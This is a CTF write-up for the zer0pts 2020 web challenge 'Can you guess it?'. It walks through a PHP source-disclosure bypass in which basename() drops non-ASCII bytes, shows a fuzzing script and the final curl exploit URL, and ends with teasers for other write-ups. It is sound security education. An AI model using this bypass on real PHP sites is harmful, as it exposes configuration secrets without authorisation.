Try   HackMD

[zer0pts CTF 2020] Can you guess it?

tags: zer0pts CTF, zer0pts CTF 2020, web

Solution

We're given the source code (index.php) and Dockerfile. As you can see from index.php, you can get the flag if you can guess bin2hex(random_bytes(64)) or get config.php.











































<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Can you guess it?</title>
  </head>
  <body>
    <h1>Can you guess it?</h1>
    <p>If your guess is correct, I'll give you the flag.</p>
    <p><a href="?source">Source</a></p>
    <hr>
<?php if (isset($message)) { ?>
    <p><?= $message ?></p>
<?php } ?>
    <form action="index.php" method="POST">
      <input type="text" name="guess">
      <input type="submit">
    </form>
  </body>
</html>

Of course guessing random_bytes(64) is not realistic, so the goal is to read config.php. Also, bypassing hash_equals is impossible because if one of parameters is not string, hash_equals returns FALSE, so if you post guess[]=test, this app shows Wrong.

The remaining suspicious part is highlight_file(basename($_SERVER['PHP_SELF']));, which prints the source code itself. basename is a function that returns filename of given path, and $_SERVER['PHP_SELF'] is a path of currently executing script.

But why this app checks if $_SERVER['PHP_SELF'] ends with config.php? This is because if you access /index.php/config.php, $_SERVER['PHP_SELF'] is /index.php/config.php. So, if there is no check, the server shows the content of config.php.

So, we need to bypass the check. Let's see the document of basename again.

Caution
basename() is locale aware, so for it to see the correct basename with multibyte character paths, the matching locale must be set using the setlocale() function.

What does it mean? Let's reproduce the environment with given Dockerfile and
fuzz.

$ docker run --rm -it php:7.3-apache bash
︙
root@a06cc21f03e1:/tmp# apt install -y libicu-dev
root@a06cc21f03e1:/tmp# docker-php-ext-install intl
root@a06cc21f03e1:/tmp# cat test.php
<?php
function check($str) {
  return preg_match('/config\.php\/*$/i', $str);
}

for ($i = 0; $i < 0x100; $i++) {
  $s = '/index.php/config.php/' . IntlChar::chr($i);
  if (!check($s)) {
    $t = basename('/index.php/config.php/' . chr($i));
    echo "${i}: ${t}\n";
  }
}
root@a06cc21f03e1:/tmp# php test.php
︙
120: x
121: y
122: z
123: {
124: |
125: }
126: ~
127: ^?
128: config.php
129: config.php
130: config.php
131: config.php
132: config.php
︙

Wow, if /(character out of ASCII range) is appended, basename returns config.php.

Finally, you can get the flag by accessing http://3.112.201.75:8003/index.php/config.php/%80?source.

$ curl http://3.112.201.75:8003/index.php/config.php/%80?source
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br />define</span><span style="color: #007700">(</span><span style="color: #DD0000">'FLAG'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'zer0pts{gu3ss1ng_r4nd0m_by73s_1s_un1n73nd3d_s0lu710n}'</span><span style="color: #007700">);</span>
</span>
</code>
Last changed by 
st98
https://st98.github.io https://twitter.com/st98_
0
3605

Read more

GuestFS:AFR - zer0pts CTF 2021

Overview This is a service that you can create, read, and delete files including symbolic links. Filename should not contain characters except for 0-9A-Za-z. When you create a symbolic link, the link target should not start with / or contain ... Solution Paths of link targets will be only checked when files are created. Looking through the source code, you will notice that the order of checking a target path is, calling symlink, then checking the target path with readlink. Why does it checks the target path after a symbolic link is created? /* Create a symbolic link */

Mar 7, 2021
Baby SQLi - zer0pts CTF 2021

Overview The flag is in templates/index.html as below. To obtain the flag, you need to be logged in as admin, or read the content of the template file. {% if name == &apos;admin&apos; %} &lt;p&gt;zer0pts{*****CENSORED*****}&lt;/p&gt; {% else %} User input will be embedded in SQL statement, however, SQL Injection in /login seems to be prevented by escaping it.

Mar 6, 2021
Kantan Calc - zer0pts CTF 2021

Overview User input and the flag will be inserted into &apos;use strict&apos;; (function () { return ${code}; /* ${FLAG} */ })(), and the server executes the code in sandbox. const result = vm.runInNewContext(`&apos;use strict&apos;; (function () { return ${code}; /* ${FLAG} */ })()`, {}, { timeout: 100 }); As you can see in the code, the flag is inserted as a comment in a function, after user input. So, what you need to do is somehow exfiltrating the comment by, for example, converting the function to String and outputting it. Since the server sets the maximum length of user input to 29 characters, you need to do code-golf with some features available in recent ECMAScript. const code = req.query.code + &apos;&apos;;

Mar 6, 2021
Simple Blog - zer0pts CTF 2021

Overview This application fetches api.php and renders the contents by JSONP. The length of the name of a callback function is up to 20 characters. &lt;?php header(&apos;Content-Type: application/javascript&apos;); $callback = $_GET[&apos;callback&apos;] ?? &apos;render&apos;; if (strlen($callback) &gt; 20) { die(&apos;throw new Error(&quot;callback name is too long&quot;)&apos;); }

Mar 6, 2021
Read more from st98
Published on HackMD